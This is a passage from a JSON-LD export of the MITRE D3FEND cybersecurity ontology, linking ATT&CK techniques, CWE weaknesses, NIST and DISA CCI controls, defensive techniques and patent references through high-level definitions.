      "d3f:kb-reference-title": "Domain age registration alert",
      "rdfs:label": "Reference - Domain age registration alert - Inc Rapid7 Inc RAPID7 Inc"
    },
    {
      "@id": "d3f:T0826",
      "@type": "owl:Class",
      "d3f:attack-id": "T0826",
      "d3f:definition": "Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Loss of Availability - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of Availability"
    },
    {
      "@id": "d3f:CWE-1078",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1078",
      "d3f:definition": "The source code does not follow desired style or formatting for indentation, white space, comments, etc.",
      "rdfs:label": "Inappropriate Source Code Style or Formatting",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-2_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Event Logging | Compilation of Audit Records from Multiple Sources",
      "d3f:exactly": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AU-2(1)"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_8",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Security and Privacy Policy Filters",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(8)"
    },
    {
      "@id": "d3f:CWE-1056",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1056",
      "d3f:definition": "A named-callable or method control element has a signature that supports a variable (variadic) number of parameters or arguments.",
      "rdfs:label": "Invokable Control Element with Variadic Parameters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:CCI-000187_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for PKI-based authentication, maps the authenticated identity to the account of the individual or group.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:CredentialHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000187"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-23",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Data Mining Protection",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:JobFunctionAccessPatternAnalysis"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:UserDataTransferAnalysis"
        }
      ],
      "rdfs:label": "AC-23"
    },
    {
      "@id": "d3f:SystemDependencyMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemDependencyMapping"
      ],
      "d3f:d3fend-id": "D3-SYSDM",
      "d3f:definition": "System dependency mapping identifies and models the dependencies of system components on each other to carry out their function.",
      "d3f:kb-article": "## How it works\nThe organization collects and models architectural information about the software, hardware, and products and maps the dependencies between systems, including each system's internal components and dependencies.\n\n## Considerations\n* Data exchanges identified in the network mapping efforts usually indicate such dependencies, but may not be part of the intended design.\n* Architectural design artifacts and SMEs may need to be consulted to determine if dependencies are intended or otherwise essential.\n* System depedency mapping can identify internal dependencies of standard and pre-built systems that should be incorporated into a complete system dependency model.\n* System dependencies for critical systems--those supporting critical organizational activities--should be prioritized for supply chain risk analysis.\n* System dependencies should identify the integral components of a given named system and their structure to form a system.\n* System dependencies with a given system may be fixed by a particular product's configuration, and leveraging external knowledge bases about dependencies available (e.g., from package managers) is essential.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CatiaUAFPlugin"
        },
        {
          "@id": "d3f:Reference-SoftwareVulnerabilityGraphDatabase"
        },
        {
          "@id": "d3f:Reference-TivoliApplicationDependencyDiscoverManager7_3_0DependenciesBetweenResources"
        },
        {
          "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF"
        }
      ],
      "d3f:maps": {
        "@id": "d3f:SystemDependency"
      },
      "rdfs:label": "System Dependency Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemMapping"
        },
        {
          "@id": "_:Na3fcd2eb076b48a380873d5e8475d8b0"
        }
      ]
    },
    {
      "@id": "_:Na3fcd2eb076b48a380873d5e8475d8b0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemDependency"
      }
    },
    {
      "@id": "d3f:T1681",
      "@type": "owl:Class",
      "d3f:attack-id": "T1681",
      "d3f:definition": "Threat actors may seek information/indicators from closed or open threat intelligence sources gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. These reports may include descriptions of behavior, detailed breakdowns of attacks, atomic indicators such as malware hashes or IP addresses, timelines of a group’s activity, and more. Adversaries may change their behavior when planning their future operations.",
      "rdfs:label": "Search Threat Vendor Data",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:PrincipalComponentsAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PCA",
      "d3f:definition": "Principal Component Analysis (PCA) is a statistic-based method of identifying patterns in a large dataset while increasing interpretability and preserving information.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Principal component analysis. [Link](https://en.wikipedia.org/wiki/Principal_component_analysis)",
      "rdfs:label": "Principal Components Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:DimensionReduction"
      }
    },
    {
      "@id": "d3f:Reference-DataProcessingAndScanningSystemsForGeneratingAndPopulatingADataInventory",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US11240273B2/"
      },
      "d3f:kb-abstract": "In particular embodiments, a data processing data inventory generation system is configured to: (1) generate a data model (e.g., a data inventory) for one or more data assets utilized by a particular organization; (2) generate a respective data inventory for each of the one or more data assets; and (3) map one or more relationships between one or more aspects of the data inventory, the one or more data assets, etc. within the data model. In particular embodiments, a data asset (e.g., data system, software application, etc.) may include, for example, any entity that collects, processes, contains, and/or transfers personal data (e.g., such as a software application, “internet of things” computerized device, database, website, data-center, server, etc.). The system may be configured to identify particular data assets and/or personal data in data repositories using any suitable intelligent identity scanning technique.",
      "d3f:kb-author": "Kabir A. Barday, Mihir S. Karanjkar, Steven W. Finch, Ken A. Browne, Nathan W. Heard, Aakash H. Patel, Jason L. Sabourin, Richard L. Daniel, Dylan D. Patton-Kuhl, Jonathan Blake Brannon",
      "d3f:kb-organization": "OneTrust LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:DataInventory"
      },
      "d3f:kb-reference-title": "Data processing and scanning systems for generating and populating a data inventory",
      "rdfs:label": "Reference - Data processing and scanning systems for generating and populating a data inventory"
    },
    {
      "@id": "d3f:BootRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A d3f:Record which is an essential component of the early boot (system initialization) process.",
      "rdfs:label": "Boot Record",
      "rdfs:subClassOf": {
        "@id": "d3f:Record"
      }
    },
    {
      "@id": "d3f:CWE-1188",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1188",
      "d3f:definition": "The product initializes or sets a resource with a default that is intended to be changed by the administrator, but the default is not secure.",
      "rdfs:label": [
        "Initialization of a Resource with an Insecure Default",
        "Insecure Default Initialization of Resource"
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1419"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1391",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1391",
      "d3f:definition": "The product uses weak credentials (such as a default key or hard-coded password) that can be calculated, derived, reused, or guessed by an attacker.",
      "rdfs:label": "Use of Weak Credentials",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:AML.T0008.004",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008.004",
      "d3f:definition": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.\n\nOnce acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server. As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers. This can be used to bypass a Content Security Policy which prevent retrieving content from arbitrary locations.",
      "rdfs:label": "Serverless - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0008"
      },
      "skos:prefLabel": "Serverless"
    },
    {
      "@id": "d3f:Reference-MethodAndApparatusForDetectingMaliciousWebsites_EndgameInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20140331319A1"
      },
      "d3f:kb-abstract": "A method and apparatus for detecting malicious websites is disclosed.",
      "d3f:kb-author": "John Burnet MUNRO, IV; Jason Aaron Trost; Zachary Daniel HANIF",
      "d3f:kb-mitre-analysis": "This patent describes a domain classification engine on the host computer that analyzes URLs clicked by a user or entered into a web browser to visit a website. URL analysis is done by using a combination of techniques:\n\n* Feature extraction: A URL is analyzed against features associated with suspicious URLs such as % of longest consecutive digits in a subdomain, % of longest repeated characters in a subdomain, % of vowels in a high level domain.\n\n* Markov analysis: The probability of a digit occurring in normal language given the preceding two digits is determined. For example, if the received URL is google.com, the probability of a 'g' occurring at the beginning of a word, the probability of an 'o' occurring after a \"g, the probability of an \"o' occurring after a 'g' and \"o, and so forth will be determined. The probability of each digit is then multiplied to get a probability for the whole domain name. Probabilities are determined based on a database of existing usage, such as a dictionary, or a list of known good domain names\n\n* Domain names are compared against an existing dataset of known unauthorized domain names.\n\nA rating is developed based on the results of these techniques, and if the rating is over a set threshold, an action is taken such as blocking access or generating an alert.",
      "d3f:kb-organization": "Endgame Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:URLAnalysis"
      },
      "d3f:kb-reference-title": "Method and Apparatus for Detecting Malicious Websites",
      "rdfs:label": "Reference - Method and Apparatus for Detecting Malicious Websites - Endgame Inc"
    },
    {
      "@id": "d3f:OTTransportConfigurationCommand",
      "@type": "owl:Class",
      "d3f:definition": "Configure transport settings for a communication channel.",
      "rdfs:comment": "Modbus: Encapsulated Interface Transport",
      "rdfs:label": "OT Transport Configuration Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTNetworkManagementCommand"
      }
    },
    {
      "@id": "d3f:CWE-314",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-314",
      "d3f:definition": "The product stores sensitive information in cleartext in the registry.",
      "rdfs:label": "Cleartext Storage in the Registry",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:NetworkVideoStreamingResource",
      "@type": "owl:Class",
      "d3f:definition": "A server that provides digital video media content to users.",
      "rdfs:label": "Network Video Streaming Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkMediaStreamingResource"
      }
    },
    {
      "@id": "d3f:CCI-002165_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces organization-defined discretionary access control policies over defined subjects and objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002165"
    },
    {
      "@id": "d3f:ReverseResolutionIPDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ReverseResolutionIPDenylisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "d3f:d3fend-id": "D3-RRID",
      "d3f:definition": "Blocking a reverse lookup based on the query's IP address value.",
      "d3f:kb-article": "## How it works\nThis technique prevents a client from learning domains deemed to be potentially malicious, which would have been delivered via reverse resolution responses over the DNS protocol.\n\nQueries for reverse resolution requests (that is, requests where IP(s) are sent and a domain is returned) are collected, and the IP address(es) included in the query are examined. If the IP address(es) are in a range included in the blacklist, then the query is dropped.\n\n## Considerations\n- The blacklist will have to be maintained and will need to be kept up to date with identified maintenance cycles to ensure lists are not stale.\n- DNS query traffic can be transmitted over many different protocols, which presents a challenge to implementing methods to extract all DNS query IP address value(s).\n  - DNS has historically used UDP port 53, with TCP port 53 instead used for responses over 512 bytes or after a lack of response over UDP.\n  - Usage of new protocols to provide confidentiality for DNS traffic, such as DoH (DNS over HTTPS) and DoT (DNS over TLS), complicates collection of the IP address(es) in DNS queries. These protocols have often been enabled in browser settings transparently after a browser update, with DNS queries proxied over one of these cryptographic protocols through a specified host.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries"
      },
      "d3f:synonym": "Reverse Resolution IP Blacklisting",
      "rdfs:label": "Reverse Resolution IP Denylisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DNSDenylisting"
        },
        {
          "@id": "_:N2619759435504e22a6fcf2488232fe3f"
        }
      ]
    },
    {
      "@id": "_:N2619759435504e22a6fcf2488232fe3f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "d3f:OSAPIExec",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that replaces the current process image with a new processs image, executing a specified program.",
      "d3f:invokes": {
        "@id": "d3f:Exec"
      },
      "rdfs:label": "OS API Exec",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nc1c8b28ac551434fa4cda5cd3183ba3f"
        }
      ]
    },
    {
      "@id": "_:Nc1c8b28ac551434fa4cda5cd3183ba3f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Exec"
      }
    },
    {
      "@id": "_:Nfadb52edfdfb4c5891f28e14571f557a",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:Kurtosis"
          },
          {
            "@id": "d3f:Moments"
          },
          {
            "@id": "d3f:Skewness"
          }
        ]
      }
    },
    {
      "@id": "d3f:T1629.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1629.003",
      "d3f:definition": "Adversaries may disable security tools to avoid potential detection of their tools and activities. This can take the form of disabling security software, modifying SELinux configuration, or other methods to interfere with security tools scanning or reporting information. This is typically done by abusing device administrator permissions or using system exploits to gain root access to the device to modify protected system files.",
      "rdfs:label": "Disable or Modify Tools - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1629"
      },
      "skos:prefLabel": "Disable or Modify Tools"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SC-2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:control-name": "Separation of System and User Functionality",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SC-2"
    },
    {
      "@id": "d3f:StackComponent",
      "@type": "owl:Class",
      "d3f:definition": "A stack component is any component of a call stack used for stack-based memory allocation in a running process.  Examples include saved instruction pointers, stack frames, and stack frame canaries.",
      "rdfs:label": "Stack Component",
      "rdfs:seeAlso": {
        "@id": "dbr:Call_stack"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:CWE-1236",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1236",
      "d3f:definition": "The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.",
      "d3f:synonym": [
        "CSV Injection",
        "Excel Macro Injection",
        "Formula Injection"
      ],
      "rdfs:label": "Improper Neutralization of Formula Elements in a CSV File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:T1436",
      "@type": "owl:Class",
      "d3f:attack-id": "T1436",
      "d3f:definition": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Commonly Used Port - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileExfiltrationTechnique"
        }
      ],
      "skos:prefLabel": "Commonly Used Port"
    },
    {
      "@id": "d3f:Step",
      "@type": "owl:Class",
      "rdfs:label": "Step",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Plan"
        },
        {
          "@id": "_:N049e59d1d130483999be6ab2c755065c"
        },
        {
          "@id": "_:Nb62a22b6153f41108743d0e8377b27f3"
        },
        {
          "@id": "_:N6f17252821f4468dbc3f523da93ce6c8"
        },
        {
          "@id": "_:Ne1ef39d216254b8cacaeb8111f9d528f"
        }
      ]
    },
    {
      "@id": "_:N049e59d1d130483999be6ab2c755065c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:end"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Step"
      }
    },
    {
      "@id": "_:Nb62a22b6153f41108743d0e8377b27f3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:fork"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Step"
      }
    },
    {
      "@id": "_:N6f17252821f4468dbc3f523da93ce6c8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-associated-with"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Artifact"
      }
    },
    {
      "@id": "_:Ne1ef39d216254b8cacaeb8111f9d528f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:next"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Step"
      }
    },
    {
      "@id": "d3f:T1003.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:OperatingSystemFile"
        },
        {
          "@id": "d3f:ProcessImage"
        }
      ],
      "d3f:attack-id": "T1003.007",
      "d3f:definition": "Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)",
      "rdfs:label": "Proc Filesystem",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:Na30c17ff3f154be08d15089c193f9c46"
        },
        {
          "@id": "_:N590d382198da47048db401518b5baa7d"
        }
      ]
    },
    {
      "@id": "_:Na30c17ff3f154be08d15089c193f9c46",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "_:N590d382198da47048db401518b5baa7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessImage"
      }
    },
    {
      "@id": "d3f:CWE-806",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-806",
      "d3f:definition": "The product uses the size of a source buffer when reading from or writing to a destination buffer, which may cause it to access memory that is outside of the bounds of the buffer.",
      "rdfs:label": "Buffer Access Using Size of Source Buffer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-805"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-7_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:control-name": "Unsuccessful Logon Attempts | Use of Alternate Authentication Factor",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-7(4)"
    },
    {
      "@id": "d3f:T1498",
      "@type": "owl:Class",
      "d3f:attack-id": "T1498",
      "d3f:definition": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)",
      "rdfs:label": "Network Denial of Service",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:OTEngineeringWorkstation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:communicates-with": {
        "@id": "d3f:OTController"
      },
      "d3f:definition": "An Engineering Workstation (EWS) is used to perform various maintenance, configuration, or diagnostics functions for a control system. The EWS will likely require dedicated application software to interface with various devices (e.g., RTUs, PLCs), and may be used to transfer data or files between the control system devices and other networks.",
      "d3f:runs": {
        "@id": "d3f:OTEngineeringSoftware"
      },
      "d3f:synonym": "EWS",
      "rdfs:isDefinedBy": {
        "@id": "https://attack.mitre.org/assets/A0001"
      },
      "rdfs:label": "OT Engineering Workstation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ClientComputer"
        },
        {
          "@id": "_:N0c6160daf8b74adfb6e3a15b62099be1"
        },
        {
          "@id": "_:N6a6a6dcbf7b745ae84703a8711db4690"
        }
      ]
    },
    {
      "@id": "_:N0c6160daf8b74adfb6e3a15b62099be1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:communicates-with"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTController"
      }
    },
    {
      "@id": "_:N6a6a6dcbf7b745ae84703a8711db4690",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEngineeringSoftware"
      }
    },
    {
      "@id": "d3f:Mean",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MEA",
      "d3f:definition": "The sum of all measurements divided by the number of observations in the data set.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "rdfs:label": "Mean",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:queries",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x queries y: The entity x requests information or data from entity y.",
      "rdfs:label": "queries",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-query"
        }
      ]
    },
    {
      "@id": "d3f:CWE-161",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-161",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Multiple Leading Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-160"
      }
    },
    {
      "@id": "d3f:StorageDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing the activity, configuration, or errors of storage devices, including physical disks, SSDs, or logical partitions. These events often pertain to data availability, integrity, and storage health.",
      "rdfs:label": "Storage Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N28104029cd7b4f4bb93b4718aed8f023"
        }
      ]
    },
    {
      "@id": "_:N28104029cd7b4f4bb93b4718aed8f023",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:CWE-129",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-129",
      "d3f:definition": "The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array.",
      "d3f:synonym": [
        "array index underflow",
        "index-out-of-range",
        "out-of-bounds array index"
      ],
      "rdfs:label": "Improper Validation of Array Index",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1285"
      }
    },
    {
      "@id": "d3f:BootROM",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:First-stageBootLoader"
      },
      "d3f:definition": "Boot ROM is a piece of read-only memory (ROM) that is used for booting a computer system. It contains instructions that are run after the CPU is reset to the reset vector, and it typically loads a bootloader.",
      "d3f:synonym": "Boot Read-only Memory",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Boot_ROM"
      },
      "rdfs:label": "Boot ROM",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ROM"
        },
        {
          "@id": "_:Nbc4d91f34899437ca65ac974bc835fc1"
        }
      ]
    },
    {
      "@id": "_:Nbc4d91f34899437ca65ac974bc835fc1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:First-stageBootLoader"
      }
    },
    {
      "@id": "d3f:T1087",
      "@type": "owl:Class",
      "d3f:attack-id": "T1087",
      "d3f:definition": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
      "rdfs:label": "Account Discovery",
      "rdfs:seeAlso": {
        "@id": "d3f:T1136"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001744_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:OperatingSystemMonitoring"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements organization-defined security responses automatically if baseline configurations are changed in an unauthorized manner.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001744"
    },
    {
      "@id": "d3f:OTDeviceManagementMessage",
      "@type": "owl:Class",
      "d3f:definition": "Manage devices and their configurations.",
      "rdfs:label": "OT Device Management Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:InboundInternetDNSResponseTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Inbound internet DNS response traffic is DNS response traffic from a host outside a given network initiated on an incoming connection to a host inside that network.",
      "rdfs:label": "Inbound Internet DNS Response Traffic",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/dns_answer"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:PublicKey",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A public key can be disseminated widely as part of an asymmetric cryptography framework and be used to encrypt messages to send to the public key's owner or to authenticate signed messages from that sender.",
      "d3f:depends-on": {
        "@id": "d3f:PrivateKey"
      },
